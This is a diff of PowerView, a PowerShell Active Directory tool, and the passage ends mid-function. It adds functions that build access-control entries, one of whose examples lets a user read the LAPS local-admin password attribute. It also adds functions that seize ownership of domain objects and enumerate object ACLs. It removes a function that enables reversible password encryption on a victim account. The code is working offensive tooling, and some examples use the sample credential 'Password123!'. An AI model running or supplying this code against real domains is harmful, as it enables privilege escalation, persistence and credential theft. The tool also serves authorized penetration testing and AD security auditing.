+for the domain principal to add for the ACL. Required. Wildcards accepted.
+
+.PARAMETER PrincipalDomain
+
+Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain.
+
+.PARAMETER PrincipalSearchBase
+
+The LDAP source to search through for principals, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
- .PARAMETER Credential
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.PARAMETER Credential
- .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- PS C:\> Get-ADObject -SID "S-1-5-21-2620891829-2411261497-1773853088-1110"
-
- Get the domain object associated with the specified SID.
-
- .EXAMPLE
+.PARAMETER Right
- PS C:\> Get-ADObject -ADSpath "CN=AdminSDHolder,CN=System,DC=testlab,DC=local"
-
- Get the AdminSDHolder object for the testlab.local domain.
+Specifies the rights set on the Active Directory object.
+
+.PARAMETER AccessControlType
+
+Specifies the type of ACE (allow or deny)
+
+.PARAMETER AuditFlag
+
+For audit ACEs, specifies when to create an audit log (on success or failure)
+
+.PARAMETER ObjectType
+
+Specifies the GUID of the object that the ACE applies to.
+
+.PARAMETER InheritanceType
+
+Specifies how the ACE applies to the object and/or its children.
+
+.PARAMETER InheritedObjectType
+
+Specifies the type of object that can inherit the ACE.
+
+.EXAMPLE
+
+$Guids = Get-DomainGUIDMap
+$AdmPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'ms-Mcs-AdmPwd'} | select -ExpandProperty name
+$CompPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'Computer'} | select -ExpandProperty name
+$ACE = New-ADObjectAccessControlEntry -Verbose -PrincipalIdentity itadmin -Right ExtendedRight,ReadProperty -AccessControlType Allow -ObjectType $AdmPropertyGuid -InheritanceType All -InheritedObjectType $CompPropertyGuid
+$OU = Get-DomainOU -Raw Workstations
+$DsEntry = $OU.GetDirectoryEntry()
+$dsEntry.PsBase.Options.SecurityMasks = 'Dacl'
+$dsEntry.PsBase.ObjectSecurity.AddAccessRule($ACE)
+$dsEntry.PsBase.CommitChanges()
+
+Adds an ACE to all computer objects in the OU "Workstations" permitting the
+user "itadmin" to read the confidential ms-Mcs-AdmPwd computer property.
+
+.OUTPUTS
+
+System.Security.AccessControl.AuthorizationRule
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('System.Security.AccessControl.AuthorizationRule')]
[CmdletBinding()]
Param (
- [Parameter(ValueFromPipeline=$True)]
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True, Mandatory = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name')]
[String]
- $SID,
+ $PrincipalIdentity,
+ [ValidateNotNullOrEmpty()]
[String]
- $Name,
+ $PrincipalDomain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $SamAccountName,
+ $Server,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
- $Domain,
+ $SearchScope = 'Subtree',
- [String]
- $DomainController,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
- [String]
- $ADSpath,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [Parameter(Mandatory = $True)]
+ [ValidateSet('AccessSystemSecurity', 'CreateChild','Delete','DeleteChild','DeleteTree','ExtendedRight','GenericAll','GenericExecute','GenericRead','GenericWrite','ListChildren','ListObject','ReadControl','ReadProperty','Self','Synchronize','WriteDacl','WriteOwner','WriteProperty')]
+ $Right,
+
+ [Parameter(Mandatory = $True, ParameterSetName='AccessRuleType')]
+ [ValidateSet('Allow', 'Deny')]
+ [String[]]
+ $AccessControlType,
+ [Parameter(Mandatory = $True, ParameterSetName='AuditRuleType')]
+ [ValidateSet('Success', 'Failure')]
[String]
- $Filter,
+ $AuditFlag,
- [Switch]
- $ReturnRaw,
+ [Parameter(Mandatory = $False, ParameterSetName='AccessRuleType')]
+ [Parameter(Mandatory = $False, ParameterSetName='AuditRuleType')]
+ [Parameter(Mandatory = $False, ParameterSetName='ObjectGuidLookup')]
+ [Guid]
+ $ObjectType,
- [ValidateRange(1,10000)]
- [Int]
- $PageSize = 200,
+ [ValidateSet('All', 'Children','Descendents','None','SelfAndChildren')]
+ [String]
+ $InheritanceType,
- [Management.Automation.PSCredential]
- $Credential
+ [Guid]
+ $InheritedObjectType
)
- process {
- if($SID) {
- # if a SID is passed, try to resolve it to a reachable domain name for the searcher
- try {
- $Name = Convert-SidToName $SID
- if($Name) {
- $Canonical = Convert-ADName -ObjectName $Name -InputType NT4 -OutputType Canonical
- if($Canonical) {
- $Domain = $Canonical.split("/")[0]
- }
- else {
- Write-Warning "Error resolving SID '$SID'"
- return $Null
- }
- }
- }
- catch {
- Write-Warning "Error resolving SID '$SID' : $_"
- return $Null
- }
+
+ Begin {
+ $PrincipalSearcherArguments = @{
+ 'Identity' = $PrincipalIdentity
+ 'Properties' = 'distinguishedname,objectsid'
+ }
+ if ($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain }
+ if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential }
+ $Principal = Get-DomainObject @PrincipalSearcherArguments
+ if (-not $Principal) {
+ throw "Unable to resolve principal: $PrincipalIdentity"
+ } elseif($Principal.Count -gt 1) {
+ throw "PrincipalIdentity matches multiple AD objects, but only one is allowed"
}
- $ObjectSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
+ $ADRight = 0
+ foreach($r in $Right) {
+ $ADRight = $ADRight -bor (([System.DirectoryServices.ActiveDirectoryRights]$r).value__)
+ }
+ $ADRight = [System.DirectoryServices.ActiveDirectoryRights]$ADRight
- if($ObjectSearcher) {
- if($SID) {
- $ObjectSearcher.filter = "(&(objectsid=$SID)$Filter)"
- }
- elseif($Name) {
- $ObjectSearcher.filter = "(&(name=$Name)$Filter)"
- }
- elseif($SamAccountName) {
- $ObjectSearcher.filter = "(&(samAccountName=$SamAccountName)$Filter)"
+ $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$Principal.objectsid)
+ }
+
+ Process {
+ if($PSCmdlet.ParameterSetName -eq 'AuditRuleType') {
+
+ if($ObjectType -eq $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) {
+ New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag
+ } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) {
+ New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType)
+ } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) {
+ New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType), $InheritedObjectType
+ } elseif($ObjectType -ne $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) {
+ New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType
+ } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) {
+ New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType, $InheritanceType
+ } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) {
+ New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType, $InheritanceType, $InheritedObjectType
}
- $Results = $ObjectSearcher.FindAll()
- $Results | Where-Object {$_} | ForEach-Object {
- if($ReturnRaw) {
- $_
- }
- else {
- # convert/process the LDAP fields for each result
- Convert-LDAPProperty -Properties $_.Properties
- }
+ }
+ else {
+
+ if($ObjectType -eq $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) {
+ New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType
+ } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) {
+ New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType)
+ } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) {
+ New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType), $InheritedObjectType
+ } elseif($ObjectType -ne $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) {
+ New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType
+ } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) {
+ New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType, $InheritanceType
+ } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) {
+ New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType, $InheritanceType, $InheritedObjectType
}
- $Results.dispose()
- $ObjectSearcher.dispose()
+
}
}
}
-function Set-ADObject {
+function Set-DomainObjectOwner {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Modifies the owner for a specified active directory object.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject
- Takes a SID, name, or SamAccountName to query for a specified
- domain object, and then sets a specified 'PropertyName' to a
- specified 'PropertyValue'.
+.DESCRIPTION
- .PARAMETER SID
+Retrieves the Active Directory object specified by -Identity by splatting to
+Get-DomainObject, returning the raw searchresult object. Retrieves the raw
+directoryentry for the object, and sets the object owner to -OwnerIdentity.
- The SID of the domain object you're querying for.
+.PARAMETER Identity
- .PARAMETER Name
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+of the AD object to set the owner for.
- The Name of the domain object you're querying for.
+.PARAMETER OwnerIdentity
- .PARAMETER SamAccountName
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+of the owner to set for -Identity.
- The SamAccountName of the domain object you're querying for.
+.PARAMETER Domain
- .PARAMETER Domain
+Specifies the domain to use for the query, defaults to the current domain.
- The domain to query for objects, defaults to the current domain.
+.PARAMETER LDAPFilter
- .PARAMETER DomainController
+Specifies an LDAP query string that is used to filter Active Directory objects.
- Domain controller to reflect LDAP queries through.
+.PARAMETER SearchBase
- .PARAMETER Filter
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- Additional LDAP filter string for the query.
+.PARAMETER Server
- .PARAMETER PropertyName
+Specifies an Active Directory server (domain controller) to bind to.
- The property name to set.
+.PARAMETER SearchScope
- .PARAMETER PropertyValue
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- The value to set for PropertyName
+.PARAMETER ResultPageSize
- .PARAMETER PropertyXorValue
+Specifies the PageSize to set for the LDAP searcher object.
- Integer value to binary xor (-bxor) with the current int value.
+.PARAMETER ServerTimeLimit
- .PARAMETER ClearValue
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- Switch. Clear the value of PropertyName
+.PARAMETER Tombstone
- .PARAMETER PageSize
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- The PageSize to set for the LDAP searcher object.
+.PARAMETER Credential
- .PARAMETER Credential
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.EXAMPLE
- .EXAMPLE
+Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
- PS C:\> Set-ADObject -SamAccountName matt.admin -PropertyName countrycode -PropertyValue 0
-
- Set the countrycode for matt.admin to 0
+Set the owner of 'dfm' in the current domain to 'harmj0y'.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Set-ADObject -SamAccountName matt.admin -PropertyName useraccountcontrol -PropertyXorValue 65536
-
- Set the password not to expire on matt.admin
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y -Credential $Cred
+
+Set the owner of 'dfm' in the current domain to 'harmj0y' using the alternate credentials.
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[CmdletBinding()]
- Param (
+ Param(
+ [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name')]
[String]
- $SID,
+ $Identity,
+ [Parameter(Mandatory = $True)]
+ [ValidateNotNullOrEmpty()]
+ [Alias('Owner')]
[String]
- $Name,
+ $OwnerIdentity,
+ [ValidateNotNullOrEmpty()]
[String]
- $SamAccountName,
+ $Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
[String]
- $Domain,
+ $LDAPFilter,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $DomainController,
+ $SearchBase,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $Filter,
+ $Server,
- [Parameter(Mandatory = $True)]
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
- $PropertyName,
+ $SearchScope = 'Subtree',
- $PropertyValue,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+ [ValidateRange(1, 10000)]
[Int]
- $PropertyXorValue,
+ $ServerTimeLimit,
[Switch]
- $ClearValue,
-
- [ValidateRange(1,10000)]
- [Int]
- $PageSize = 200,
+ $Tombstone,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- $Arguments = @{
- 'SID' = $SID
- 'Name' = $Name
- 'SamAccountName' = $SamAccountName
- 'Domain' = $Domain
- 'DomainController' = $DomainController
- 'Filter' = $Filter
- 'PageSize' = $PageSize
- 'Credential' = $Credential
- }
- # splat the appropriate arguments to Get-ADObject
- $RawObject = Get-ADObject -ReturnRaw @Arguments
-
- try {
- # get the modifiable object for this search result
- $Entry = $RawObject.GetDirectoryEntry()
-
- if($ClearValue) {
- Write-Verbose "Clearing value"
- $Entry.$PropertyName.clear()
- $Entry.commitchanges()
+ BEGIN {
+ $SearcherArguments = @{}
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+ $OwnerSid = Get-DomainObject @SearcherArguments -Identity $OwnerIdentity -Properties objectsid | Select-Object -ExpandProperty objectsid
+ if ($OwnerSid) {
+ $OwnerIdentityReference = [System.Security.Principal.SecurityIdentifier]$OwnerSid
+ }
+ else {
+ Write-Warning "[Set-DomainObjectOwner] Error parsing owner identity '$OwnerIdentity'"
}
+ }
- elseif($PropertyXorValue) {
- $TypeName = $Entry.$PropertyName[0].GetType().name
+ PROCESS {
+ if ($OwnerIdentityReference) {
+ $SearcherArguments['Raw'] = $True
+ $SearcherArguments['Identity'] = $Identity
- # UAC value references- https://support.microsoft.com/en-us/kb/305144
- $PropertyValue = $($Entry.$PropertyName) -bxor $PropertyXorValue
- $Entry.$PropertyName = $PropertyValue -as $TypeName
- $Entry.commitchanges()
- }
+ # splat the appropriate arguments to Get-DomainObject
+ $RawObject = Get-DomainObject @SearcherArguments
- else {
- $Entry.put($PropertyName, $PropertyValue)
- $Entry.setinfo()
+ ForEach ($Object in $RawObject) {
+ try {
+ Write-Verbose "[Set-DomainObjectOwner] Attempting to set the owner for '$Identity' to '$OwnerIdentity'"
+ $Entry = $RawObject.GetDirectoryEntry()
+ $Entry.PsBase.Options.SecurityMasks = 'Owner'
+ $Entry.PsBase.ObjectSecurity.SetOwner($OwnerIdentityReference)
+ $Entry.PsBase.CommitChanges()
+ }
+ catch {
+ Write-Warning "[Set-DomainObjectOwner] Error setting owner: $_"
+ }
+ }
}
}
- catch {
- Write-Warning "Error setting property $PropertyName to value '$PropertyValue' for object $($RawObject.Properties.samaccountname) : $_"
- }
}
-function Invoke-DowngradeAccount {
+function Get-DomainObjectAcl {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Returns the ACLs associated with a specific active directory object. By default
+the DACL for the object(s) is returned, but the SACL can be returned with -Sacl.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainGUIDMap
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+.PARAMETER Sacl
+
+Switch. Return the SACL instead of the DACL for the object (default behavior).
+
+.PARAMETER ResolveGUIDs
+
+Switch. Resolve GUIDs to their display names.
+
+.PARAMETER RightsFilter
+
+A specific set of rights to return ('All', 'ResetPassword', 'WriteMembers').
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER SearchBase
- Set reversible encryption on a given account and then force the password
- to be set on next user login. To repair use "-Repair".
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- .PARAMETER SamAccountName
+.PARAMETER Server
- The SamAccountName of the domain object you're querying for.
+Specifies an Active Directory server (domain controller) to bind to.
- .PARAMETER Name
+.PARAMETER SearchScope
- The Name of the domain object you're querying for.
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- .PARAMETER Domain
+.PARAMETER ResultPageSize
- The domain to query for objects, defaults to the current domain.
+Specifies the PageSize to set for the LDAP searcher object.
- .PARAMETER DomainController
+.PARAMETER ServerTimeLimit
- Domain controller to reflect LDAP queries through.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- .PARAMETER Filter
+.PARAMETER Tombstone
- Additional LDAP filter string for the query.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- .PARAMETER Repair
+.PARAMETER Credential
- Switch. Unset the reversible encryption flag and force password reset flag.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- .PARAMETER Credential
+.EXAMPLE
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+Get-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs
- .EXAMPLE
+Get the ACLs for the matt.admin user in the testlab.local domain and
+resolve relevant GUIDs to their display names.
- PS> Invoke-DowngradeAccount -SamAccountName jason
+.EXAMPLE
- Set reversible encryption on the 'jason' account and force the password to be changed.
+Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs
- .EXAMPLE
+Enumerate the ACL permissions for all OUs in the domain.
- PS> Invoke-DowngradeAccount -SamAccountName jason -Repair
+.EXAMPLE
- Unset reversible encryption on the 'jason' account and remove the forced password change.
+Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs -Sacl
+
+Enumerate the SACLs for all OUs in the domain, resolving GUIDs.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainObjectAcl -Credential $Cred -ResolveGUIDs
+
+.OUTPUTS
+
+PowerView.ACL
+
+Custom PSObject with ACL entries.
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.ACL')]
[CmdletBinding()]
Param (
- [Parameter(ParameterSetName = 'SamAccountName', Position=0, ValueFromPipeline=$True)]
- [String]
- $SamAccountName,
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+ [String[]]
+ $Identity,
+
+ [Switch]
+ $Sacl,
+
+ [Switch]
+ $ResolveGUIDs,
- [Parameter(ParameterSetName = 'Name')]
[String]
- $Name,
+ [Alias('Rights')]
+ [ValidateSet('All', 'ResetPassword', 'WriteMembers')]
+ $RightsFilter,
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $DomainController,
+ $SearchBase,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $Filter,
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
[Switch]
- $Repair,
+ $Tombstone,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- process {
- $Arguments = @{
- 'SamAccountName' = $SamAccountName
- 'Name' = $Name
- 'Domain' = $Domain
- 'DomainController' = $DomainController
- 'Filter' = $Filter
- 'Credential' = $Credential
+ BEGIN {
+ $SearcherArguments = @{
+ 'Properties' = 'samaccountname,ntsecuritydescriptor,distinguishedname,objectsid'
}
- # splat the appropriate arguments to Get-ADObject
- $UACValues = Get-ADObject @Arguments | select useraccountcontrol | ConvertFrom-UACValue
-
- if($Repair) {
-
- if($UACValues.Keys -contains "ENCRYPTED_TEXT_PWD_ALLOWED") {
- # if reversible encryption is set, unset it
- Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 128
- }
+ if ($PSBoundParameters['Sacl']) {
+ $SearcherArguments['SecurityMasks'] = 'Sacl'
+ }
+ else {
+ $SearcherArguments['SecurityMasks'] = 'Dacl'
+ }
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ $Searcher = Get-DomainSearcher @SearcherArguments
+
+ $DomainGUIDMapArguments = @{}
+ if ($PSBoundParameters['Domain']) { $DomainGUIDMapArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $DomainGUIDMapArguments['Server'] = $Server }
+ if ($PSBoundParameters['ResultPageSize']) { $DomainGUIDMapArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $DomainGUIDMapArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Credential']) { $DomainGUIDMapArguments['Credential'] = $Credential }
- # unset the forced password change
- Set-ADObject @Arguments -PropertyName pwdlastset -PropertyValue -1
+ # get a GUID -> name mapping
+ if ($PSBoundParameters['ResolveGUIDs']) {
+ $GUIDs = Get-DomainGUIDMap @DomainGUIDMapArguments
}
+ }
- else {
+ PROCESS {
+ if ($Searcher) {
+ $IdentityFilter = ''
+ $Filter = ''
+ $Identity | Where-Object {$_} | ForEach-Object {
+ $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+ if ($IdentityInstance -match '^S-1-.*') {
+ $IdentityFilter += "(objectsid=$IdentityInstance)"
+ }
+ elseif ($IdentityInstance -match '^(CN|OU|DC)=.*') {
+ $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+ if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
+ # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
+ # and rebuild the domain searcher
+ $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ Write-Verbose "[Get-DomainObjectAcl] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
+ $SearcherArguments['Domain'] = $IdentityDomain
+ $Searcher = Get-DomainSearcher @SearcherArguments
+ if (-not $Searcher) {
+ Write-Warning "[Get-DomainObjectAcl] Unable to retrieve domain searcher for '$IdentityDomain'"
+ }
+ }
+ }
+ elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
+ $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
+ $IdentityFilter += "(objectguid=$GuidByteString)"
+ }
+ elseif ($IdentityInstance.Contains('.')) {
+ $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(dnshostname=$IdentityInstance))"
+ }
+ else {
+ $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(displayname=$IdentityInstance))"
+ }
+ }
+ if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+ $Filter += "(|$IdentityFilter)"
+ }
- if($UACValues.Keys -contains "DONT_EXPIRE_PASSWORD") {
- # if the password is set to never expire, unset
- Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 65536
+ if ($PSBoundParameters['LDAPFilter']) {
+ Write-Verbose "[Get-DomainObjectAcl] Using additional LDAP filter: $LDAPFilter"
+ $Filter += "$LDAPFilter"
}
- if($UACValues.Keys -notcontains "ENCRYPTED_TEXT_PWD_ALLOWED") {
- # if reversible encryption is not set, set it
- Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 128
+ if ($Filter) {
+ $Searcher.filter = "(&$Filter)"
}
+ Write-Verbose "[Get-DomainObjectAcl] Get-DomainObjectAcl filter string: $($Searcher.filter)"
+
+ $Results = $Searcher.FindAll()
+ $Results | Where-Object {$_} | ForEach-Object {
+ $Object = $_.Properties
+
+ if ($Object.objectsid -and $Object.objectsid[0]) {
+ $ObjectSid = (New-Object System.Security.Principal.SecurityIdentifier($Object.objectsid[0],0)).Value
+ }
+ else {
+ $ObjectSid = $Null
+ }
+
+ try {
